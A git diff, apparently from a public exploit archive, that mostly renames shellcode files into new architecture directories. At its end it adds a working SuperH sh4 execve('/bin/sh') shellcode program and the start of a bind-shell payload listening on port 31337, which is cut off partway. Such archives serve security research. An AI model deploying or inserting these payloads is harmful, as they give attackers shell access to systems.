b/shellcodes/linux_x86/13440.c similarity index 100% rename from shellcodes/lin_x86/13440.c rename to shellcodes/linux_x86/13440.c diff --git a/shellcodes/lin_x86/13441.c b/shellcodes/linux_x86/13441.c similarity index 100% rename from shellcodes/lin_x86/13441.c rename to shellcodes/linux_x86/13441.c diff --git a/shellcodes/lin_x86/13442.c b/shellcodes/linux_x86/13442.c similarity index 100% rename from shellcodes/lin_x86/13442.c rename to shellcodes/linux_x86/13442.c diff --git a/shellcodes/lin_x86/13443.c b/shellcodes/linux_x86/13443.c similarity index 100% rename from shellcodes/lin_x86/13443.c rename to shellcodes/linux_x86/13443.c diff --git a/shellcodes/lin_x86/13444.c b/shellcodes/linux_x86/13444.c similarity index 100% rename from shellcodes/lin_x86/13444.c rename to shellcodes/linux_x86/13444.c diff --git a/shellcodes/lin_x86/13445.c b/shellcodes/linux_x86/13445.c similarity index 100% rename from shellcodes/lin_x86/13445.c rename to shellcodes/linux_x86/13445.c diff --git a/shellcodes/lin_x86/13446.c b/shellcodes/linux_x86/13446.c similarity index 100% rename from shellcodes/lin_x86/13446.c rename to shellcodes/linux_x86/13446.c diff --git a/shellcodes/lin_x86/13447.c b/shellcodes/linux_x86/13447.c similarity index 100% rename from shellcodes/lin_x86/13447.c rename to shellcodes/linux_x86/13447.c diff --git a/shellcodes/lin_x86/13448.c b/shellcodes/linux_x86/13448.c similarity index 100% rename from shellcodes/lin_x86/13448.c rename to shellcodes/linux_x86/13448.c diff --git a/shellcodes/lin_x86/13449.c b/shellcodes/linux_x86/13449.c similarity index 100% rename from shellcodes/lin_x86/13449.c rename to shellcodes/linux_x86/13449.c diff --git a/shellcodes/lin_x86/13450.c b/shellcodes/linux_x86/13450.c similarity index 100% rename from shellcodes/lin_x86/13450.c rename to shellcodes/linux_x86/13450.c diff --git a/shellcodes/lin_x86/13451.c b/shellcodes/linux_x86/13451.c similarity index 100% rename from shellcodes/lin_x86/13451.c rename to shellcodes/linux_x86/13451.c diff --git a/shellcodes/lin_x86/13452.c b/shellcodes/linux_x86/13452.c similarity index 100% rename from shellcodes/lin_x86/13452.c rename to shellcodes/linux_x86/13452.c diff --git a/shellcodes/lin_x86/13453.c b/shellcodes/linux_x86/13453.c similarity index 100% rename from shellcodes/lin_x86/13453.c rename to shellcodes/linux_x86/13453.c diff --git a/shellcodes/lin_x86/13454.c b/shellcodes/linux_x86/13454.c similarity index 100% rename from shellcodes/lin_x86/13454.c rename to shellcodes/linux_x86/13454.c diff --git a/shellcodes/lin_x86/13455.c b/shellcodes/linux_x86/13455.c similarity index 100% rename from shellcodes/lin_x86/13455.c rename to shellcodes/linux_x86/13455.c diff --git a/shellcodes/lin_x86/13456.c b/shellcodes/linux_x86/13456.c similarity index 100% rename from shellcodes/lin_x86/13456.c rename to shellcodes/linux_x86/13456.c diff --git a/shellcodes/lin_x86/13457.c b/shellcodes/linux_x86/13457.c similarity index 100% rename from shellcodes/lin_x86/13457.c rename to shellcodes/linux_x86/13457.c diff --git a/shellcodes/lin_x86/13458.c b/shellcodes/linux_x86/13458.c similarity index 100% rename from shellcodes/lin_x86/13458.c rename to shellcodes/linux_x86/13458.c diff --git a/shellcodes/lin_x86/13460.c b/shellcodes/linux_x86/13460.c similarity index 100% rename from shellcodes/lin_x86/13460.c rename to shellcodes/linux_x86/13460.c diff --git a/shellcodes/lin_x86/13461.c b/shellcodes/linux_x86/13461.c similarity index 100% rename from shellcodes/lin_x86/13461.c rename to shellcodes/linux_x86/13461.c diff --git a/shellcodes/lin_x86/13462.c b/shellcodes/linux_x86/13462.c similarity index 100% rename from shellcodes/lin_x86/13462.c rename to shellcodes/linux_x86/13462.c diff --git a/shellcodes/lin_x86/13548.asm b/shellcodes/linux_x86/13548.asm similarity index 100% rename from shellcodes/lin_x86/13548.asm rename to shellcodes/linux_x86/13548.asm diff --git a/shellcodes/lin_x86/13549.c b/shellcodes/linux_x86/13549.c similarity index 100% rename from shellcodes/lin_x86/13549.c rename to shellcodes/linux_x86/13549.c diff --git a/shellcodes/lin_x86/13550.c b/shellcodes/linux_x86/13550.c similarity index 100% rename from shellcodes/lin_x86/13550.c rename to shellcodes/linux_x86/13550.c diff --git a/shellcodes/lin_x86/13551.c b/shellcodes/linux_x86/13551.c similarity index 100% rename from shellcodes/lin_x86/13551.c rename to shellcodes/linux_x86/13551.c diff --git a/shellcodes/lin_x86/13553.c b/shellcodes/linux_x86/13553.c similarity index 100% rename from shellcodes/lin_x86/13553.c rename to shellcodes/linux_x86/13553.c diff --git a/shellcodes/lin_x86/13563.asm b/shellcodes/linux_x86/13563.asm similarity index 100% rename from shellcodes/lin_x86/13563.asm rename to shellcodes/linux_x86/13563.asm diff --git a/shellcodes/lin_x86/13566.c b/shellcodes/linux_x86/13566.c similarity index 100% rename from shellcodes/lin_x86/13566.c rename to shellcodes/linux_x86/13566.c diff --git a/shellcodes/lin_x86/13572.c b/shellcodes/linux_x86/13572.c similarity index 100% rename from shellcodes/lin_x86/13572.c rename to shellcodes/linux_x86/13572.c diff --git a/shellcodes/lin_x86/13576.asm b/shellcodes/linux_x86/13576.asm similarity index 100% rename from shellcodes/lin_x86/13576.asm rename to shellcodes/linux_x86/13576.asm diff --git a/shellcodes/lin_x86/13577.txt b/shellcodes/linux_x86/13577.txt similarity index 100% rename from shellcodes/lin_x86/13577.txt rename to shellcodes/linux_x86/13577.txt diff --git a/shellcodes/lin_x86/13578.txt b/shellcodes/linux_x86/13578.txt similarity index 100% rename from shellcodes/lin_x86/13578.txt rename to shellcodes/linux_x86/13578.txt diff --git a/shellcodes/lin_x86/13579.c b/shellcodes/linux_x86/13579.c similarity index 100% rename from shellcodes/lin_x86/13579.c rename to shellcodes/linux_x86/13579.c diff --git a/shellcodes/lin_x86/13586.txt b/shellcodes/linux_x86/13586.txt similarity index 100% rename from shellcodes/lin_x86/13586.txt rename to shellcodes/linux_x86/13586.txt diff --git a/shellcodes/lin_x86/13599.txt b/shellcodes/linux_x86/13599.txt similarity index 100% rename from shellcodes/lin_x86/13599.txt rename to shellcodes/linux_x86/13599.txt diff --git a/shellcodes/lin_x86/13600.txt b/shellcodes/linux_x86/13600.txt similarity index 100% rename from shellcodes/lin_x86/13600.txt rename to shellcodes/linux_x86/13600.txt diff --git a/shellcodes/lin_x86/13601.txt b/shellcodes/linux_x86/13601.txt similarity index 100% rename from shellcodes/lin_x86/13601.txt rename to shellcodes/linux_x86/13601.txt diff --git a/shellcodes/lin_x86/13602.txt b/shellcodes/linux_x86/13602.txt similarity index 100% rename from shellcodes/lin_x86/13602.txt rename to shellcodes/linux_x86/13602.txt diff --git a/shellcodes/lin_x86/13609.c b/shellcodes/linux_x86/13609.c similarity index 100% rename from shellcodes/lin_x86/13609.c rename to shellcodes/linux_x86/13609.c diff --git a/shellcodes/lin_x86/13627.c b/shellcodes/linux_x86/13627.c similarity index 100% rename from shellcodes/lin_x86/13627.c rename to shellcodes/linux_x86/13627.c diff --git a/shellcodes/lin_x86/13628.c b/shellcodes/linux_x86/13628.c similarity index 100% rename from shellcodes/lin_x86/13628.c rename to shellcodes/linux_x86/13628.c diff --git a/shellcodes/lin_x86/13632.c b/shellcodes/linux_x86/13632.c similarity index 100% rename from shellcodes/lin_x86/13632.c rename to shellcodes/linux_x86/13632.c diff --git a/shellcodes/lin_x86/13661.txt b/shellcodes/linux_x86/13661.txt similarity index 100% rename from shellcodes/lin_x86/13661.txt rename to shellcodes/linux_x86/13661.txt diff --git a/shellcodes/lin_x86/13669.c b/shellcodes/linux_x86/13669.c similarity index 100% rename from shellcodes/lin_x86/13669.c rename to shellcodes/linux_x86/13669.c diff --git a/shellcodes/lin_x86/13671.c b/shellcodes/linux_x86/13671.c similarity index 100% rename from shellcodes/lin_x86/13671.c rename to shellcodes/linux_x86/13671.c diff --git a/shellcodes/lin_x86/13673.c b/shellcodes/linux_x86/13673.c similarity index 100% rename from shellcodes/lin_x86/13673.c rename to shellcodes/linux_x86/13673.c diff --git a/shellcodes/lin_x86/13675.c b/shellcodes/linux_x86/13675.c similarity index 100% rename from shellcodes/lin_x86/13675.c rename to shellcodes/linux_x86/13675.c diff --git a/shellcodes/lin_x86/13676.c b/shellcodes/linux_x86/13676.c similarity index 100% rename from shellcodes/lin_x86/13676.c rename to shellcodes/linux_x86/13676.c diff --git a/shellcodes/lin_x86/13677.c b/shellcodes/linux_x86/13677.c similarity index 100% rename from shellcodes/lin_x86/13677.c rename to shellcodes/linux_x86/13677.c diff --git a/shellcodes/lin_x86/13680.c b/shellcodes/linux_x86/13680.c similarity index 100% rename from shellcodes/lin_x86/13680.c rename to shellcodes/linux_x86/13680.c diff --git a/shellcodes/lin_x86/13681.c b/shellcodes/linux_x86/13681.c similarity index 100% rename from shellcodes/lin_x86/13681.c rename to shellcodes/linux_x86/13681.c diff --git a/shellcodes/lin_x86/13682.c b/shellcodes/linux_x86/13682.c similarity index 100% rename from shellcodes/lin_x86/13682.c rename to shellcodes/linux_x86/13682.c diff --git a/shellcodes/lin_x86/13692.c b/shellcodes/linux_x86/13692.c similarity index 100% rename from shellcodes/lin_x86/13692.c rename to shellcodes/linux_x86/13692.c diff --git a/shellcodes/lin_x86/13697.c b/shellcodes/linux_x86/13697.c similarity index 100% rename from shellcodes/lin_x86/13697.c rename to shellcodes/linux_x86/13697.c diff --git a/shellcodes/lin_x86/13698.c b/shellcodes/linux_x86/13698.c similarity index 100% rename from shellcodes/lin_x86/13698.c rename to shellcodes/linux_x86/13698.c diff --git a/shellcodes/lin_x86/13702.c b/shellcodes/linux_x86/13702.c similarity index 100% rename from shellcodes/lin_x86/13702.c rename to shellcodes/linux_x86/13702.c diff --git a/shellcodes/lin_x86/13703.txt b/shellcodes/linux_x86/13703.txt similarity index 100% rename from shellcodes/lin_x86/13703.txt rename to shellcodes/linux_x86/13703.txt diff --git a/shellcodes/lin_x86/13712.c b/shellcodes/linux_x86/13712.c similarity index 100% rename from shellcodes/lin_x86/13712.c rename to shellcodes/linux_x86/13712.c diff --git a/shellcodes/lin_x86/13715.c b/shellcodes/linux_x86/13715.c similarity index 100% rename from shellcodes/lin_x86/13715.c rename to shellcodes/linux_x86/13715.c diff --git a/shellcodes/lin_x86/13716.c b/shellcodes/linux_x86/13716.c similarity index 100% rename from shellcodes/lin_x86/13716.c rename to shellcodes/linux_x86/13716.c diff --git a/shellcodes/lin_x86/13722.c b/shellcodes/linux_x86/13722.c similarity index 100% rename from shellcodes/lin_x86/13722.c rename to shellcodes/linux_x86/13722.c diff --git a/shellcodes/lin_x86/13723.c b/shellcodes/linux_x86/13723.c similarity index 100% rename from shellcodes/lin_x86/13723.c rename to shellcodes/linux_x86/13723.c diff --git a/shellcodes/lin_x86/13724.c b/shellcodes/linux_x86/13724.c similarity index 100% rename from shellcodes/lin_x86/13724.c rename to shellcodes/linux_x86/13724.c diff --git a/shellcodes/lin_x86/13725.txt b/shellcodes/linux_x86/13725.txt similarity index 100% rename from shellcodes/lin_x86/13725.txt rename to shellcodes/linux_x86/13725.txt diff --git a/shellcodes/lin_x86/13726.txt b/shellcodes/linux_x86/13726.txt similarity index 100% rename from shellcodes/lin_x86/13726.txt rename to shellcodes/linux_x86/13726.txt diff --git a/shellcodes/lin_x86/13728.c b/shellcodes/linux_x86/13728.c similarity index 100% rename from shellcodes/lin_x86/13728.c rename to shellcodes/linux_x86/13728.c diff --git a/shellcodes/lin_x86/13730.c b/shellcodes/linux_x86/13730.c similarity index 100% rename from shellcodes/lin_x86/13730.c rename to shellcodes/linux_x86/13730.c diff --git a/shellcodes/lin_x86/13731.c b/shellcodes/linux_x86/13731.c similarity index 100% rename from shellcodes/lin_x86/13731.c rename to shellcodes/linux_x86/13731.c diff --git a/shellcodes/lin_x86/13732.c b/shellcodes/linux_x86/13732.c similarity index 100% rename from shellcodes/lin_x86/13732.c rename to shellcodes/linux_x86/13732.c diff --git a/shellcodes/lin_x86/13742.c b/shellcodes/linux_x86/13742.c similarity index 100% rename from shellcodes/lin_x86/13742.c rename to shellcodes/linux_x86/13742.c diff --git a/shellcodes/lin_x86/13743.c b/shellcodes/linux_x86/13743.c similarity index 100% rename from shellcodes/lin_x86/13743.c rename to shellcodes/linux_x86/13743.c diff --git a/shellcodes/lin_x86/13910.c b/shellcodes/linux_x86/13910.c similarity index 100% rename from shellcodes/lin_x86/13910.c rename to shellcodes/linux_x86/13910.c diff --git a/shellcodes/lin_x86/14119.c b/shellcodes/linux_x86/14119.c similarity index 100% rename from shellcodes/lin_x86/14119.c rename to shellcodes/linux_x86/14119.c diff --git a/shellcodes/lin_x86/14216.c b/shellcodes/linux_x86/14216.c similarity index 100% rename from shellcodes/lin_x86/14216.c rename to shellcodes/linux_x86/14216.c diff --git a/shellcodes/lin_x86/14332.c b/shellcodes/linux_x86/14332.c similarity index 100% rename from shellcodes/lin_x86/14332.c rename to shellcodes/linux_x86/14332.c diff --git a/shellcodes/lin_x86/14334.c b/shellcodes/linux_x86/14334.c similarity index 100% rename from shellcodes/lin_x86/14334.c rename to shellcodes/linux_x86/14334.c diff --git a/shellcodes/lin_x86/14691.c b/shellcodes/linux_x86/14691.c similarity index 100% rename from shellcodes/lin_x86/14691.c rename to shellcodes/linux_x86/14691.c diff --git a/shellcodes/lin_x86/17194.txt b/shellcodes/linux_x86/17194.txt similarity index 100% rename from shellcodes/lin_x86/17194.txt rename to shellcodes/linux_x86/17194.txt diff --git a/shellcodes/lin_x86/17371.txt b/shellcodes/linux_x86/17371.txt similarity index 100% rename from shellcodes/lin_x86/17371.txt rename to shellcodes/linux_x86/17371.txt diff --git a/shellcodes/lin_x86/17559.c b/shellcodes/linux_x86/17559.c similarity index 100% rename from shellcodes/lin_x86/17559.c rename to shellcodes/linux_x86/17559.c diff --git a/shellcodes/lin_x86/18294.c b/shellcodes/linux_x86/18294.c similarity index 100% rename from shellcodes/lin_x86/18294.c rename to shellcodes/linux_x86/18294.c diff --git a/shellcodes/lin_x86/18379.c b/shellcodes/linux_x86/18379.c similarity index 100% rename from shellcodes/lin_x86/18379.c rename to shellcodes/linux_x86/18379.c diff --git a/shellcodes/lin_x86/18885.c b/shellcodes/linux_x86/18885.c similarity index 100% rename from shellcodes/lin_x86/18885.c rename to shellcodes/linux_x86/18885.c diff --git a/shellcodes/lin_x86/20195.c b/shellcodes/linux_x86/20195.c similarity index 100% rename from shellcodes/lin_x86/20195.c rename to shellcodes/linux_x86/20195.c diff --git a/shellcodes/lin_x86/20196.c b/shellcodes/linux_x86/20196.c similarity index 100% rename from shellcodes/lin_x86/20196.c rename to shellcodes/linux_x86/20196.c diff --git a/shellcodes/lin_x86/23622.c b/shellcodes/linux_x86/23622.c similarity index 100% rename from shellcodes/lin_x86/23622.c rename to shellcodes/linux_x86/23622.c diff --git a/shellcodes/lin_x86/25497.c b/shellcodes/linux_x86/25497.c similarity index 100% rename from shellcodes/lin_x86/25497.c rename to shellcodes/linux_x86/25497.c diff --git a/shellcodes/lin_x86/28474.c b/shellcodes/linux_x86/28474.c similarity index 100% rename from shellcodes/lin_x86/28474.c rename to shellcodes/linux_x86/28474.c diff --git a/shellcodes/lin_x86/34060.c b/shellcodes/linux_x86/34060.c similarity index 100% rename from shellcodes/lin_x86/34060.c rename to shellcodes/linux_x86/34060.c diff --git a/shellcodes/lin_x86/34262.c b/shellcodes/linux_x86/34262.c similarity index 100% rename from shellcodes/lin_x86/34262.c rename to shellcodes/linux_x86/34262.c diff --git a/shellcodes/lin_x86/34592.c b/shellcodes/linux_x86/34592.c similarity index 100% rename from shellcodes/lin_x86/34592.c rename to shellcodes/linux_x86/34592.c diff --git a/shellcodes/lin_x86/34778.c b/shellcodes/linux_x86/34778.c similarity index 100% rename from shellcodes/lin_x86/34778.c rename to shellcodes/linux_x86/34778.c diff --git a/shellcodes/lin_x86/35519.txt b/shellcodes/linux_x86/35519.txt similarity index 100% rename from shellcodes/lin_x86/35519.txt rename to shellcodes/linux_x86/35519.txt diff --git a/shellcodes/lin_x86/36391.c b/shellcodes/linux_x86/36391.c similarity index 100% rename from shellcodes/lin_x86/36391.c rename to shellcodes/linux_x86/36391.c diff --git a/shellcodes/lin_x86/36393.c b/shellcodes/linux_x86/36393.c similarity index 100% rename from shellcodes/lin_x86/36393.c rename to shellcodes/linux_x86/36393.c diff --git a/shellcodes/lin_x86/36394.c b/shellcodes/linux_x86/36394.c similarity index 100% rename from shellcodes/lin_x86/36394.c rename to shellcodes/linux_x86/36394.c diff --git a/shellcodes/lin_x86/36395.c b/shellcodes/linux_x86/36395.c similarity index 100% rename from shellcodes/lin_x86/36395.c rename to shellcodes/linux_x86/36395.c diff --git a/shellcodes/lin_x86/36397.c b/shellcodes/linux_x86/36397.c similarity index 100% rename from shellcodes/lin_x86/36397.c rename to shellcodes/linux_x86/36397.c diff --git a/shellcodes/lin_x86/36398.c b/shellcodes/linux_x86/36398.c similarity index 100% rename from shellcodes/lin_x86/36398.c rename to shellcodes/linux_x86/36398.c diff --git a/shellcodes/lin_x86/36637.c b/shellcodes/linux_x86/36637.c similarity index 100% rename from shellcodes/lin_x86/36637.c rename to shellcodes/linux_x86/36637.c diff --git a/shellcodes/lin_x86/36672.asm b/shellcodes/linux_x86/36672.asm similarity index 100% rename from shellcodes/lin_x86/36672.asm rename to shellcodes/linux_x86/36672.asm diff --git a/shellcodes/lin_x86/36701.c b/shellcodes/linux_x86/36701.c similarity index 100% rename from shellcodes/lin_x86/36701.c rename to shellcodes/linux_x86/36701.c diff --git a/shellcodes/lin_x86/36750.c b/shellcodes/linux_x86/36750.c similarity index 100% rename from shellcodes/lin_x86/36750.c rename to shellcodes/linux_x86/36750.c diff --git a/shellcodes/lin_x86/36778.c b/shellcodes/linux_x86/36778.c similarity index 100% rename from shellcodes/lin_x86/36778.c rename to shellcodes/linux_x86/36778.c diff --git a/shellcodes/lin_x86/36857.c b/shellcodes/linux_x86/36857.c similarity index 100% rename from shellcodes/lin_x86/36857.c rename to shellcodes/linux_x86/36857.c diff --git a/shellcodes/lin_x86/36908.c b/shellcodes/linux_x86/36908.c similarity index 100% rename from shellcodes/lin_x86/36908.c rename to shellcodes/linux_x86/36908.c diff --git a/shellcodes/lin_x86/36921.c b/shellcodes/linux_x86/36921.c similarity index 100% rename from shellcodes/lin_x86/36921.c rename to shellcodes/linux_x86/36921.c diff --git a/shellcodes/lin_x86/37069.c b/shellcodes/linux_x86/37069.c similarity index 100% rename from shellcodes/lin_x86/37069.c rename to shellcodes/linux_x86/37069.c diff --git a/shellcodes/lin_x86/37251.asm b/shellcodes/linux_x86/37251.asm similarity index 100% rename from shellcodes/lin_x86/37251.asm rename to shellcodes/linux_x86/37251.asm diff --git a/shellcodes/lin_x86/37285.txt b/shellcodes/linux_x86/37285.txt similarity index 100% rename from shellcodes/lin_x86/37285.txt rename to shellcodes/linux_x86/37285.txt diff --git a/shellcodes/lin_x86/37289.txt b/shellcodes/linux_x86/37289.txt similarity index 100% rename from shellcodes/lin_x86/37289.txt rename to shellcodes/linux_x86/37289.txt diff --git a/shellcodes/lin_x86/37297.txt b/shellcodes/linux_x86/37297.txt similarity index 100% rename from shellcodes/lin_x86/37297.txt rename to shellcodes/linux_x86/37297.txt diff --git a/shellcodes/lin_x86/37358.c b/shellcodes/linux_x86/37358.c similarity index 100% rename from shellcodes/lin_x86/37358.c rename to shellcodes/linux_x86/37358.c diff --git a/shellcodes/lin_x86/37359.c b/shellcodes/linux_x86/37359.c similarity index 100% rename from shellcodes/lin_x86/37359.c rename to shellcodes/linux_x86/37359.c diff --git a/shellcodes/lin_x86/37365.c b/shellcodes/linux_x86/37365.c similarity index 100% rename from shellcodes/lin_x86/37365.c rename to shellcodes/linux_x86/37365.c diff --git a/shellcodes/lin_x86/37366.c b/shellcodes/linux_x86/37366.c similarity index 100% rename from shellcodes/lin_x86/37366.c rename to shellcodes/linux_x86/37366.c diff --git a/shellcodes/lin_x86/37384.c b/shellcodes/linux_x86/37384.c similarity index 100% rename from shellcodes/lin_x86/37384.c rename to shellcodes/linux_x86/37384.c diff --git a/shellcodes/lin_x86/37390.asm b/shellcodes/linux_x86/37390.asm similarity index 100% rename from shellcodes/lin_x86/37390.asm rename to shellcodes/linux_x86/37390.asm diff --git a/shellcodes/lin_x86/37391.asm b/shellcodes/linux_x86/37391.asm similarity index 100% rename from shellcodes/lin_x86/37391.asm rename to shellcodes/linux_x86/37391.asm diff --git a/shellcodes/lin_x86/37392.asm b/shellcodes/linux_x86/37392.asm similarity index 100% rename from shellcodes/lin_x86/37392.asm rename to shellcodes/linux_x86/37392.asm diff --git a/shellcodes/lin_x86/37393.asm b/shellcodes/linux_x86/37393.asm similarity index 100% rename from shellcodes/lin_x86/37393.asm rename to shellcodes/linux_x86/37393.asm diff --git a/shellcodes/lin_x86/37495.py b/shellcodes/linux_x86/37495.py similarity index 100% rename from shellcodes/lin_x86/37495.py rename to shellcodes/linux_x86/37495.py diff --git a/shellcodes/lin_x86/37749.c b/shellcodes/linux_x86/37749.c similarity index 100% rename from shellcodes/lin_x86/37749.c rename to shellcodes/linux_x86/37749.c diff --git a/shellcodes/lin_x86/37762.py b/shellcodes/linux_x86/37762.py similarity index 100% rename from shellcodes/lin_x86/37762.py rename to shellcodes/linux_x86/37762.py diff --git a/shellcodes/lin_x86/38088.c b/shellcodes/linux_x86/38088.c similarity index 100% rename from shellcodes/lin_x86/38088.c rename to shellcodes/linux_x86/38088.c diff --git a/shellcodes/lin_x86/38116.c b/shellcodes/linux_x86/38116.c similarity index 100% rename from shellcodes/lin_x86/38116.c rename to shellcodes/linux_x86/38116.c diff --git a/shellcodes/lin_x86/39160.c b/shellcodes/linux_x86/39160.c similarity index 100% rename from shellcodes/lin_x86/39160.c rename to shellcodes/linux_x86/39160.c diff --git a/shellcodes/lin_x86/39204.c b/shellcodes/linux_x86/39204.c similarity index 100% rename from shellcodes/lin_x86/39204.c rename to shellcodes/linux_x86/39204.c diff --git a/shellcodes/lin_x86/39389.c b/shellcodes/linux_x86/39389.c similarity index 100% rename from shellcodes/lin_x86/39389.c rename to shellcodes/linux_x86/39389.c diff --git a/shellcodes/lin_x86/39722.c b/shellcodes/linux_x86/39722.c similarity index 100% rename from shellcodes/lin_x86/39722.c rename to shellcodes/linux_x86/39722.c diff --git a/shellcodes/lin_x86/39723.c b/shellcodes/linux_x86/39723.c similarity index 100% rename from shellcodes/lin_x86/39723.c rename to shellcodes/linux_x86/39723.c diff --git a/shellcodes/lin_x86/39851.c b/shellcodes/linux_x86/39851.c similarity index 100% rename from shellcodes/lin_x86/39851.c rename to shellcodes/linux_x86/39851.c diff --git a/shellcodes/lin_x86/39901.c b/shellcodes/linux_x86/39901.c similarity index 100% rename from shellcodes/lin_x86/39901.c rename to shellcodes/linux_x86/39901.c diff --git a/shellcodes/lin_x86/40026.txt b/shellcodes/linux_x86/40026.txt similarity index 100% rename from shellcodes/lin_x86/40026.txt rename to shellcodes/linux_x86/40026.txt diff --git a/shellcodes/lin_x86/40056.c b/shellcodes/linux_x86/40056.c similarity index 100% rename from shellcodes/lin_x86/40056.c rename to shellcodes/linux_x86/40056.c diff --git a/shellcodes/lin_x86/40075.c b/shellcodes/linux_x86/40075.c similarity index 100% rename from shellcodes/lin_x86/40075.c rename to shellcodes/linux_x86/40075.c diff --git a/shellcodes/lin_x86/40110.c b/shellcodes/linux_x86/40110.c similarity index 100% rename from shellcodes/lin_x86/40110.c rename to shellcodes/linux_x86/40110.c diff --git a/shellcodes/lin_x86/40131.c b/shellcodes/linux_x86/40131.c similarity index 100% rename from shellcodes/lin_x86/40131.c rename to shellcodes/linux_x86/40131.c diff --git a/shellcodes/lin_x86/40179.c b/shellcodes/linux_x86/40179.c similarity index 100% rename from shellcodes/lin_x86/40179.c rename to shellcodes/linux_x86/40179.c diff --git a/shellcodes/lin_x86/40222.c b/shellcodes/linux_x86/40222.c similarity index 100% rename from shellcodes/lin_x86/40222.c rename to shellcodes/linux_x86/40222.c diff --git a/shellcodes/lin_x86/40223.c b/shellcodes/linux_x86/40223.c similarity index 100% rename from shellcodes/lin_x86/40223.c rename to shellcodes/linux_x86/40223.c diff --git a/shellcodes/lin_x86/40827.c b/shellcodes/linux_x86/40827.c similarity index 100% rename from shellcodes/lin_x86/40827.c rename to shellcodes/linux_x86/40827.c diff --git a/shellcodes/lin_x86/40872.c b/shellcodes/linux_x86/40872.c similarity index 100% rename from shellcodes/lin_x86/40872.c rename to shellcodes/linux_x86/40872.c diff --git a/shellcodes/lin_x86/40924.c b/shellcodes/linux_x86/40924.c similarity index 100% rename from shellcodes/lin_x86/40924.c rename to shellcodes/linux_x86/40924.c diff --git a/shellcodes/lin_x86/41282.nasm b/shellcodes/linux_x86/41282.nasm similarity index 100% rename from shellcodes/lin_x86/41282.nasm rename to shellcodes/linux_x86/41282.nasm diff --git a/shellcodes/lin_x86/41403.c b/shellcodes/linux_x86/41403.c similarity index 100% rename from shellcodes/lin_x86/41403.c rename to shellcodes/linux_x86/41403.c diff --git a/shellcodes/lin_x86/41630.asm b/shellcodes/linux_x86/41630.asm similarity index 100% rename from shellcodes/lin_x86/41630.asm rename to shellcodes/linux_x86/41630.asm diff --git a/shellcodes/lin_x86/41631.c b/shellcodes/linux_x86/41631.c similarity index 100% rename from shellcodes/lin_x86/41631.c rename to shellcodes/linux_x86/41631.c diff --git a/shellcodes/lin_x86/41635.txt b/shellcodes/linux_x86/41635.txt similarity index 100% rename from shellcodes/lin_x86/41635.txt rename to shellcodes/linux_x86/41635.txt diff --git a/shellcodes/lin_x86/41723.c b/shellcodes/linux_x86/41723.c similarity index 100% rename from shellcodes/lin_x86/41723.c rename to shellcodes/linux_x86/41723.c diff --git a/shellcodes/lin_x86/41757.txt b/shellcodes/linux_x86/41757.txt similarity index 100% rename from shellcodes/lin_x86/41757.txt rename to shellcodes/linux_x86/41757.txt diff --git a/shellcodes/lin_x86/41909.c b/shellcodes/linux_x86/41909.c similarity index 100% rename from shellcodes/lin_x86/41909.c rename to shellcodes/linux_x86/41909.c diff --git a/shellcodes/lin_x86/41969.c b/shellcodes/linux_x86/41969.c similarity index 100% rename from shellcodes/lin_x86/41969.c rename to shellcodes/linux_x86/41969.c diff --git a/shellcodes/lin_x86/42177.c b/shellcodes/linux_x86/42177.c similarity index 100% rename from shellcodes/lin_x86/42177.c rename to shellcodes/linux_x86/42177.c diff --git a/shellcodes/lin_x86/42208.nasm b/shellcodes/linux_x86/42208.nasm similarity index 100% rename from shellcodes/lin_x86/42208.nasm rename to shellcodes/linux_x86/42208.nasm diff --git a/shellcodes/lin_x86/42254.c b/shellcodes/linux_x86/42254.c similarity index 100% rename from shellcodes/lin_x86/42254.c rename to shellcodes/linux_x86/42254.c diff --git a/shellcodes/lin_x86/42295.c b/shellcodes/linux_x86/42295.c similarity index 100% rename from shellcodes/lin_x86/42295.c rename to shellcodes/linux_x86/42295.c diff --git a/shellcodes/lin_x86/42428.c b/shellcodes/linux_x86/42428.c similarity index 100% rename from shellcodes/lin_x86/42428.c rename to shellcodes/linux_x86/42428.c diff --git a/shellcodes/lin_x86/42594.c b/shellcodes/linux_x86/42594.c similarity index 100% rename from shellcodes/lin_x86/42594.c rename to shellcodes/linux_x86/42594.c diff --git a/shellcodes/lin_x86/42977.c b/shellcodes/linux_x86/42977.c similarity index 100% rename from shellcodes/lin_x86/42977.c rename to shellcodes/linux_x86/42977.c diff --git a/shellcodes/lin_x86/43433.c b/shellcodes/linux_x86/43433.c similarity index 100% rename from shellcodes/lin_x86/43433.c rename to shellcodes/linux_x86/43433.c diff --git a/shellcodes/lin_x86/43476.c b/shellcodes/linux_x86/43476.c similarity index 100% rename from shellcodes/lin_x86/43476.c rename to shellcodes/linux_x86/43476.c diff --git a/shellcodes/lin_x86/43489.c b/shellcodes/linux_x86/43489.c similarity index 100% rename from shellcodes/lin_x86/43489.c rename to shellcodes/linux_x86/43489.c diff --git a/shellcodes/sh4/17432.c b/shellcodes/superh_sh4/17432.c similarity index 100% rename from shellcodes/sh4/17432.c rename to shellcodes/superh_sh4/17432.c diff --git a/shellcodes/sh4/17439.c b/shellcodes/superh_sh4/17439.c similarity index 100% rename from shellcodes/sh4/17439.c rename to shellcodes/superh_sh4/17439.c diff --git a/shellcodes/sh4/18154.c b/shellcodes/superh_sh4/18154.c similarity index 100% rename from shellcodes/sh4/18154.c rename to shellcodes/superh_sh4/18154.c diff --git a/shellcodes/superh_sh4/43541.c b/shellcodes/superh_sh4/43541.c new file mode 100644 index 000000000..45445b00a --- /dev/null +++ b/shellcodes/superh_sh4/43541.c @@ -0,0 +1,27 @@ +/* + | Title: Linux/SuperH - sh4 execve("/bin/sh", 0, 0) - 19 bytes + | Date: 2011-06-22 + | Tested on: Debian-sh4 2.6.32-5-sh7751r + | Author: Florian Gaultier - agix - twitter: @Agixid + | + | http://shell-storm.org +*/ + +#include +#include + +int main(){ +char shell[] = + "\x0b\xe3"// mov #11,r3 + "\x02\xc7"// mova @(10,pc),r0 + "\x03\x64"// mov r0,r4 + "\x5a\x25"// xor r5,r5 + "\x6a\x26"// xor r6,r6 + "\x02\xc3"// trapa #2 + "/bin/sh"; + +printf("[*] Taille du ShellCode = %d\n", strlen(shell)); +(*(void (*)()) shell)(); + +return 0; +} \ No newline at end of file diff --git a/shellcodes/superh_sh4/43542.c b/shellcodes/superh_sh4/43542.c new file mode 100644 index 000000000..98cc93fe0 --- /dev/null +++ b/shellcodes/superh_sh4/43542.c @@ -0,0 +1,81 @@ +/* + * Bind /bin/sh on port 31337 + * SH4 - 132bytes + * Dad` +main: + mov #102,r3 + mov #2,r4 + mov #1,r5 + xor r6,r6 + mov.l r6,@-r15 + mov.l r5,@-r15 + mov.l r4,@-r15 + mov #1,r4 + mov r15,r5 + trapa #19 + 